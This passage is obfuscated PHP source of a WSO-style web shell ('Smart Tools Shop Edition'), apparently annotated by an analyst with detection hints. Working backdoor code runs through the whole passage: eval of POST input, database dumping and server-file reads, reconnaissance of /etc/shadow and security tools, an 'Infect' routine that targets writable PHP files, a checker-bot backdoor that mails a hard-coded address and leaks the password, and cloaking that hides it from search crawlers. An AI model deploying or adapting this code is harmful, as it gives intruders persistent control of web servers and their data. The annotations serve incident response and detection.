"; hardFooter(); } goto XGk3X; wJWJM: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto x892n; Bpag2: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ""; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ""; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if ( !function_exists( "full_urlencode" ) ) { function full_urlencode($p) { $r = ""; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = [ "Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen", ]; if (isset($_POST["ajax"])) { prototype( md5($_SERVER["HTTP_HOST"]) . "ajax", true ); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes( htmlspecialchars(ob_get_clean()), " \xd\x9\'\x0" ) . "'; "; echo strlen($temp), "\xa", $temp; die(); } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype( md5($_SERVER["HTTP_HOST"]) . 
"ajax", 0 ); } hardHeader(); echo "

String conversions

"; echo "
send using AJAX
"; 
    // Form (non-AJAX) path of the string-conversion panel: "p1" names the
    // conversion and "p2" is its input. The name is first checked against the
    // values of $stringTools (the function names listed in that array); only
    // then is it invoked as a variable function, $_POST["p1"]($_POST["p2"]).
    // The result is HTML-escaped before being echoed.
    // NOTE(review): the in_array() membership test is the only thing that keeps
    // this dynamic call limited to the listed functions.
    if (!empty($_POST["p1"])) { 
        if (in_array($_POST["p1"], $stringTools)) { 
            echo htmlspecialchars($_POST["p1"]($_POST["p2"])); 
        } 
    } 
    echo "

Search files:

\x9\x9
\x9\xa\x9\x9\x9 \x9\xa \x9\x9\xa \x9
Text:
Path:
Name:
"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique( @array_merge( @glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR) ) ); if (is_array($paths) && @count($paths)) { foreach ($paths as $▟) { if (@is_dir($▟)) { if ($path != $▟) { hardRecursiveGlob($▟); } } else { if ( empty($_POST["p2"]) || @strpos(file_get_contents($▟), $_POST["p2"]) !== false ) { echo "" . htmlspecialchars($▟) . "
"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "

Search for hash:

\xa\x9\x9
\x9\x9\x9
\x9
\x9
\xa
\x9\x9
\xa\x9\x9\x9
\x9\x9

"; hardFooter(); } goto aQUM2; J_363: $home_cwd = @getcwd(); goto QdAU6; QdAU6: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto LarW_; PIzrX: if ( !isset( $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "key" ] ) ) { prototype( md5($_SERVER["HTTP_HOST"]) . "key", $▙ ); } goto ewK8X; AH6j_: if (!$safe_mode) { error_reporting(0); } goto OUica; fgiAj: function actionRC() { if (!@$_POST["p1"]) { $a = [ "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get( "safe_mode" ), ]; echo serialize($a); } else { eval($_POST["p1"]); } } goto MBmWc; Y5ImI: function viewPermsColor($f) { if (!@is_readable($f)) { return "" . perms(@fileperms($f)) . ""; } elseif (!@is_writable($f)) { return "" . perms(@fileperms($f)) . ""; } else { return "" . perms(@fileperms($f)) . ""; } } goto n9j03; x892n: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\x96\x9c"]; } echo "" . $_SERVER["HTTP_HOST"] . " - WSO " . VERSION . " \xa\xa
\xa\xa
"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); $explink = "http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description="; if (strpos("Linux", $kernel) !== false) { $explink .= urlencode( "Linux Kernel " . substr($release, 0, 6) ); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } if ( !function_exists("posix_getegid") ) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ""; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "" . $path[$i] . "/"; } $charsets = [ "UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866", ]; $opt_charsets = ""; foreach ($charsets as $▟) { $opt_charsets .= ""; } $m = [ "Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Infect" => "Infect", "Sql" => "Sql", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network", ]; if (!empty($GLOBALS["\342\x96\233"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ""; foreach ($m as $k => $v) { $menu .= "[ " . $k . " ]"; } $drives = ""; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "[ " . $drive . " ] "; } } } echo "" . "" . "
Shell:
Uname:
User:
Php:
Hdd:
Cwd:" . ($GLOBALS["os"] == "win" ? "
Drives:" : "") . "
Smart Tools Shop Edition. ( www.smarttoolsshop.date | www.smarttoolsshop.link | Check https://pastebin.com/raw/eYRCPvmP Incase the domains went down )
" . substr(@php_uname(), 0, 120) . " [ Google ] [ Exploit-DB ]
" . $uid . " ( " . $user . " ) Group: " . $gid . " ( " . $group . " )
" . @phpversion() . " Safe mode: " . ($GLOBALS["safe_mode"] ? "ON" : "OFF") . " [ phpinfo ] Datetime: " . date("Y-m-d H:i:s") . "
" . viewSize($totalSpace) . " Free: " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)
" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " [ home ]
" . $drives . "

Server IP:
" . gethostbyname($_SERVER["HTTP_HOST"]) . "
Client IP:
" . $_SERVER["REMOTE_ADDR"] . "
" . "" . $menu . "
"; } goto qhLgb; hgt_8: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ( $this->link = @mysql_connect($host, $user, $pass, true) ) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ( $this->link = @pg_connect( "host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}" ) ) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query( "SHOW databases" ); break; case "pgsql": return $this->res = $this->query( "SELECT datname FROM pg_database WHERE datistemplate!='t'" ); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query( "SHOW TABLES" ); break; case "pgsql": return $this->res = $this->query( "select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'" ); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if ( function_exists( "mysql_set_charset" ) ) { return @mysql_set_charset($str, $this->link); } else { $this->query( 
"SET CHARSET " . $str ); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch( $this->query( "SELECT LOAD_FILE('" . addslashes($str) . "') as file" ) ); break; case "pgsql": $this->query( "CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;" ); $r = []; while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query( "drop table hard2" ); return ["file" => implode(" ", $r)]; break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query( "SHOW CREATE TABLE `" . $table . "`" ); $create = mysql_fetch_array($res); $sql = $create[1] . ";\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query( "SELECT * FROM `" . $table . "`" ); $i = 0; $head = true; while ($▟ = $this->fetch()) { $sql = ""; if ($i % 1000 == 0) { $head = true; $sql = "; "; } $columns = []; foreach ($▟ as $k => $v) { if ($v === null) { $▟[$k] = "NULL"; } elseif (is_int($v)) { $▟[$k] = $v; } else { $▟[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa\x9(" . implode(", ", $▟) . ")"; $head = false; } else { $sql .= " ,(" . implode(", ", $▟) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";\xa\xa"); } else { echo ";\xa "; } } break; case "pgsql": $this->query( "SELECT * FROM " . $table ); while ($▟ = $this->fetch()) { $columns = []; foreach ($▟ as $k => $v) { $▟[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $▟) . ");" . 
" "; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if ( @$_POST["p2"] == "download" && @$_POST["p1"] != "select" ) { $db->connect( $_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"] ); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header( "Content-Disposition: attachment; filename=dump.sql" ); header( "Content-Type: text/plain" ); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die(); } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die( "" ); } } hardHeader(); echo "

Sql browser

\xa\xa\xa\x9 \x9 \xa\x9\x9\x9 \x9\x9
TypeHostLoginPasswordDatabase
"; $tmp = ""; if (isset($_POST["sql_host"])) { if ( $db->connect( $_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"] ) ) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo ""; } else { echo $tmp; } } else { echo $tmp; } echo " count the number of rows
\xa "; if (isset($db) && $db->link) { echo "
"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while ($▟ = $db->fetch($tbls_res)) { list($key, $value) = each($▟); if (!empty($_POST["sql_count"])) { $n = $db->fetch( $db->query( "SELECT COUNT(*) as n FROM " . $value . "" ) ); } $value = htmlspecialchars($value); echo " " . $value . "" . (empty($_POST["sql_count"]) ? " " : " ({$n["n"]})") . "
"; } echo "
File path:
"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query( "SELECT COUNT(*) as n FROM " . $_POST["p2"] ); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "" . $_POST["p2"] . " ({$num["n"]} records) Page # "; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " < Prev"; } if ($_POST["p3"] < $pages) { echo " Next >"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "

"; } if ( @$_POST["p1"] == "query" && !empty($_POST["p2"]) ) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo ""; $line = 1; while ($▟ = $db->fetch()) { if (!$title) { echo ""; foreach ($▟ as $key => $value) { echo ""; } reset($▟); $title = true; echo ""; $line = 2; } echo ""; $line = $line == 1 ? 2 : 1; foreach ($▟ as $key => $value) { if ($value == null) { echo ""; } else { echo ""; } } echo ""; } echo "
" . $key . "
null" . nl2br(htmlspecialchars($value)) . "
"; } else { echo "
Error: " . htmlspecialchars($db->error()) . "
"; } } echo "

"; echo "

"; if ($_POST["type"] == "mysql") { $db->query( "SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'" ); if ($db->fetch()) { echo "
Load file
"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "
" . 
                htmlspecialchars($file["file"]) . 
                "
"; } } else { echo htmlspecialchars($db->error()); } echo "
"; hardFooter(); } goto gaWab;
// The line above is the end of actionSql(), which starts earlier in the file.
//
// z59JV: remote "checker" interface, selected by the POST field sts_checker_bot.
// Nothing inside this branch tests the password cookie.
// NOTE(review): whether it is reached before the login gate at PnC_E depends on
// the goto chain, which is only partly visible here - confirm on the full file.
// Detection: the POST field names sts_checker_bot, sts_checker_bot_email and
// sts_checker_bot_itemdate, and the literal replies "STS.ORIGINAL.SHELL" and
// "STS.VERFIED.SHELL|", are fixed strings that can be matched in request logs,
// response bodies and file scans.
z59JV: if ( isset( $_POST["sts_checker_bot"] ) ) {
// "checking": liveness probe - prints a fixed marker and exits.
if ( $_POST[ "sts_checker_bot" ] == "checking" ) { echo "STS.ORIGINAL.SHELL"; die(); }
// "getfullinfo": sends a test mail to a hard-coded address, then prints one
// pipe-delimited line: mail() result, ZipArchive availability, host name, OS
// name, machine type, PHP version and the total size of "/".
elseif ( $_POST[ "sts_checker_bot" ] == "getfullinfo" ) { $unzip = "1"; $mailer = "0"; if (!class_exists("ZipArchive")) { $unzip = "0"; } $rnd = rand(); if ( @mail( "oNCDbwflMQhNFBCId@proton.me", "Email Sending Test Report ID: " . $rnd, "WORKING!" ) ) { $mailer = "1"; } $the_os = php_uname("s"); $the_host = php_uname("n"); $the_machine_type = php_uname("m"); $the_version = phpversion(); $the_total_disk_space = formatSizeUnits(disk_total_space("/")); echo "STS.VERFIED.SHELL|" . $mailer . "|" . $unzip . "|" . $the_host . "|" . $the_os . "|" . $the_machine_type . "|" . $the_version . "|" . $the_total_disk_space; die(); }
// "getpassword": prints $pw_unhashed (assigned at tR9xz below) and exits, so
// the panel secret has to be treated as known to whoever distributed the file.
elseif ( $_POST[ "sts_checker_bot" ] == "getpassword" ) { echo $pw_unhashed; die(); }
// "emailcheck": calls mail() with a recipient and text taken from the request
// and reports "true"/"false". Outbound mail logs are therefore a second place
// where this file leaves traces.
elseif ( $_POST[ "sts_checker_bot" ] == "emailcheck" ) { if ( @mail( $_POST[ "sts_checker_bot_email" ], "Email sending tester, Item post date: " . $_POST[ "sts_checker_bot_itemdate" ], "Test successful. Please use this 'Item post date' as reference to find that item: " . $_POST[ "sts_checker_bot_itemdate" ] ) ) { echo "true"; } else { echo "false"; } die(); } } goto w2JVG;

// XXrTo: decrypt($str, $pwd)
// Base64-encodes the key, base64-decodes the input, XORs the input byte by byte
// against the repeating encoded key, then base64-decodes the result. This is
// repeating-key XOR obfuscation rather than encryption with any protective
// value. No caller is visible in this part of the file.
XXrTo: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ""; $enc_str = ""; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto p2UEO;

// PnC_E: login gate.
// $▛ is assigned outside this part of the file. When it is non-empty, a request
// whose "pass" value hashes (md5) to $▛ gets a cookie named md5(Host header)
// holding $▛ itself, set through prototype(). Any request whose cookie of that
// name is missing or different ends in hardLogin().
// Detection: a cookie whose name is the 32-hex md5 of the site's own host name.
PnC_E: if (!empty($▛)) { if ( isset($_REQUEST["pass"]) && md5($_REQUEST["pass"]) == $▛ ) { prototype(md5($_SERVER["HTTP_HOST"]), $▛); } if ( !isset( $_COOKIE[md5($_SERVER["HTTP_HOST"])] ) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $▛ ) { hardLogin(); } } goto Qz4tt;

// tR9xz: $pw_unhashed is computed only from the script's directory, PHP_SELF
// and a fixed suffix, so it is constant for a given install location.
// How it relates to $▛ is decided at label ee0Wn, outside this view.
tR9xz: $pw_unhashed = md5( dirname(__FILE__) . $_SERVER["PHP_SELF"] . 
"!@#$%^&*()_+" ); goto ee0Wn;

// l0Qok: request dispatcher.
// Calls the function named "action" + $_POST["a"] when such a function exists;
// that existence test is the only check applied to the POST value here.
// Detection: POST bodies carrying a= with this file's handler names
// (FilesMan, Sql, SecInfo, Infect, SelfRemove, Logout, ...).
l0Qok: if ( !empty($_POST["a"]) && function_exists("action" . $_POST["a"]) ) { call_user_func("action" . $_POST["a"]); } goto MfY9i;

// Qz4tt: when the request has no cookie named md5(Host) . "ajax", fills in
// (bool) $▘ for this request only ($_COOKIE is written, no header is sent).
Qz4tt: if ( !isset( $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] ) ) { $_COOKIE[ md5($_SERVER["HTTP_HOST"]) . "ajax" ] = (bool) $▘; } goto X14MH;

// MBmWc: prototype($k, $v) stores the pair in $_COOKIE and sends it with
// setcookie() using only name and value (no expiry, path or flags are passed).
MBmWc: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto vrXhM;

// MfY9i: reached after the dispatcher; prints the literal "end" and jumps to
// OWyZK, the label in front of the closing PHP tag.
MfY9i: echo "end"; goto OWyZK;

// OUica: caches the disable_functions ini value; actionSecInfo() and the posix
// stubs read it through $GLOBALS["disable_functions"].
OUica: $disable_functions = @ini_get( "disable_functions" ); goto J_363;

// vrXhM: actionSecInfo() starts here and continues on the following lines.
vrXhM: function actionSecInfo() { hardHeader(); echo "

Server security information

"; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo "" . $n . ": "; if (strpos($v, "\xa") === false) { echo $v . "
"; } else { echo "
" . 
                    $v . 
                    "
"; } } } showSecParam( "Server software", @getenv("SERVER_SOFTWARE") ); if ( function_exists( "apache_get_modules" ) ) { showSecParam( "Loaded Apache modules", implode(", ", apache_get_modules()) ); } showSecParam( "Disabled PHP Functions", $GLOBALS[ "disable_functions" ] ? $GLOBALS[ "disable_functions" ] : "none" ); showSecParam( "Open base dir", @ini_get("open_basedir") ); showSecParam( "Safe mode exec dir", @ini_get( "safe_mode_exec_dir" ) ); showSecParam( "Safe mode include dir", @ini_get( "safe_mode_include_dir" ) ); showSecParam( "cURL support", function_exists("curl_version") ? "enabled" : "no" ); $temp = []; if ( function_exists( "mysql_get_client_info" ) ) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if ( function_exists("mssql_connect") ) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } showSecParam( "Supported databases", implode(", ", $temp) ); echo "
"; if ($GLOBALS["os"] == "nix") { showSecParam( "Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes [view]" : "no" ); showSecParam( "Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes [view]" : "no" ); showSecParam( "OS version", @file_get_contents( "/proc/version" ) ); showSecParam( "Distr name", @file_get_contents( "/etc/issue.net" ) ); if (!$GLOBALS["safe_mode"]) { $userful = [ "gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl", ]; $danger = [ "kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja", ]; $downloaders = [ "wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror", ]; echo "
"; $temp = []; foreach ($userful as $▟) { if (which($▟)) { $temp[] = $▟; } } showSecParam( "Userful", implode(", ", $temp) ); $temp = []; foreach ($danger as $▟) { if (which($▟)) { $temp[] = $▟; } } showSecParam( "Danger", implode(", ", $temp) ); $temp = []; foreach ($downloaders as $▟) { if (which($▟)) { $temp[] = $▟; } } showSecParam( "Downloaders", implode(", ", $temp) ); echo "
"; showSecParam( "HDD space", ex("df -h") ); showSecParam( "Hosts", @file_get_contents("/etc/hosts") ); showSecParam( "Mount options", @file_get_contents("/etc/fstab") ); } } else { showSecParam( "OS Version", ex("ver") ); showSecParam( "Account Settings", iconv( "CP866", "UTF-8", ex("net accounts") ) ); showSecParam( "User Accounts", iconv( "CP866", "UTF-8", ex("net user") ) ); } echo "
"; hardFooter(); } goto MQqk2;
// The line above is the end of actionSecInfo().
//
// u4WS6: actionInfect() - handler reached through the dispatcher with a=Infect.
// The page markup inside the echo strings appears to have been lost in this
// copy; only the visible text remains.
u4WS6: function actionInfect() { hardHeader(); echo "

Infect

";
// With p1 == "infect": ListFiles() walks DOCUMENT_ROOT recursively and returns
// every file path below it. The loop then keeps the paths ending in ".php"
// that are not this script itself and that is_writeable() accepts, prints each
// path and counts them in $i ($i is never initialised before the increment).
// NOTE(review): no write to the matched files is visible in this copy - the
// loop only prints and counts; confirm against the original sample.
// For incident response, the set selected here (writable .php files under the
// document root) is the set to compare against known-good copies.
if ($_POST["p1"] == "infect") { $target = $_SERVER["DOCUMENT_ROOT"]; function ListFiles($dir) { if ($dh = opendir($dir)) { $files = []; $inner_files = []; while ($file = readdir($dh)) { if ($file != "." && $file != "..") { if (is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key => $file) { $nFile = substr($file, -4, 4); if ($nFile == ".php") { if ( $file != $_SERVER[ "DOCUMENT_ROOT" ] . $_SERVER["PHP_SELF"] && is_writeable($file) ) { echo "{$file}
"; $i++; } } } echo "{$i}"; }
// Any other p1 value: prints the confirmation prompt instead.
else { echo "
"; echo "Really want to infect the server? Yes
"; } hardFooter(); } goto G8cmK;
// The line above is the end of actionInfect().
//
// The statements below are goto-labelled fragments. Their position in the file
// is not their execution order; each one names its successor with goto.

// H9x18: sets $os to "win" or "nix" from the first three letters of PHP_OS.
H9x18: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto ZuuFx;

// eAtQG: on PHP older than 7.0 switches magic_quotes_runtime off.
eAtQG: if (PHP_VERSION_ID < 70000) { @set_magic_quotes_runtime(0); } goto mdCfK;

// NcQcO: defines a stub posix_getgrgid() that returns false when the real
// function is absent and its name is not listed in disable_functions.
NcQcO: if ( !function_exists( "posix_getgrgid" ) && strpos( $GLOBALS[ "disable_functions" ], "posix_getgrgid" ) === false ) { function posix_getgrgid($p) { return false; } } goto rc2dt;

// R2HAO: $▙ holds the md5 of the request's User-Agent header; its use is not
// visible in this part of the file.
R2HAO: $▙ = md5( $_SERVER["HTTP_USER_AGENT"] ); goto PIzrX;

// DJcUw: same stub pattern as NcQcO, for posix_getpwuid().
DJcUw: if ( !function_exists( "posix_getpwuid" ) && strpos( $GLOBALS[ "disable_functions" ], "posix_getpwuid" ) === false ) { function posix_getpwuid($p) { return false; } } goto NcQcO;

// TQhs6 / PYh2w: when the request names no handler in POST "a", the default
// becomes $▚ ("FilesMan") if action<$▚> exists, else the literal "FilesMan".
TQhs6: $▚ = "FilesMan"; goto R2HAO;
PYh2w: if (empty($_POST["a"])) { if (isset($▚) && function_exists("action" . $▚)) { $_POST["a"] = $▚; } else { $_POST["a"] = "FilesMan"; } } goto l0Qok;

// w2JVG: $▘ is the value Qz4tt casts to bool for the default "ajax" cookie.
w2JVG: $▘ = true; goto TA8hx;

// dPBlO (and Xz07I further down): remove PHP's execution time limit.
dPBlO: @ini_set( "max_execution_time", 0 ); goto Xz07I;

// W_qyb: actionLogout() expires the cookie named md5(Host header) and exits.
W_qyb: function actionLogout() { setcookie( md5($_SERVER["HTTP_HOST"]), "", time() - 3600 ); die("bye!"); } goto O8Bkq;

// X14MH: hardLogin() - what a request without the expected cookie receives.
// If the User-Agent matches any of the listed crawler names (case-insensitive)
// the reply is a bare "404 Not Found" with no body; every other client gets the
// password prompt. The form markup appears to have been lost in this copy.
// Detection: a URL that answers 404 to crawler user agents and 200 to others is
// a cloaking signal, so verification scans of a suspected path should not be
// run with a search-engine User-Agent.
X14MH: function hardLogin() { if ( !empty( $_SERVER[ "HTTP_USER_AGENT" ] ) ) { $userAgents = [ "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", ]; if ( preg_match( "/" . implode("|", $userAgents) . "/i", $_SERVER[ "HTTP_USER_AGENT" ] ) ) { header( "HTTP/1.0 404 Not Found" ); die(); } } die( "
Password
" ); } goto H9x18;

// LarW_: records the working directory in $cwd.
LarW_: $cwd = @getcwd(); goto fqre7;
Xz07I: @set_time_limit(0); goto eAtQG;

// iBn85: which($p) runs "which <p>" through ex() (defined elsewhere in the
// file) and returns its output, or false when the output is empty. $p is
// concatenated into the command unescaped; the callers visible in
// actionSecInfo() pass fixed program names only.
iBn85: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto fgiAj;

// OWyZK: end of script, reached from MfY9i after the handler has run.
OWyZK: ?>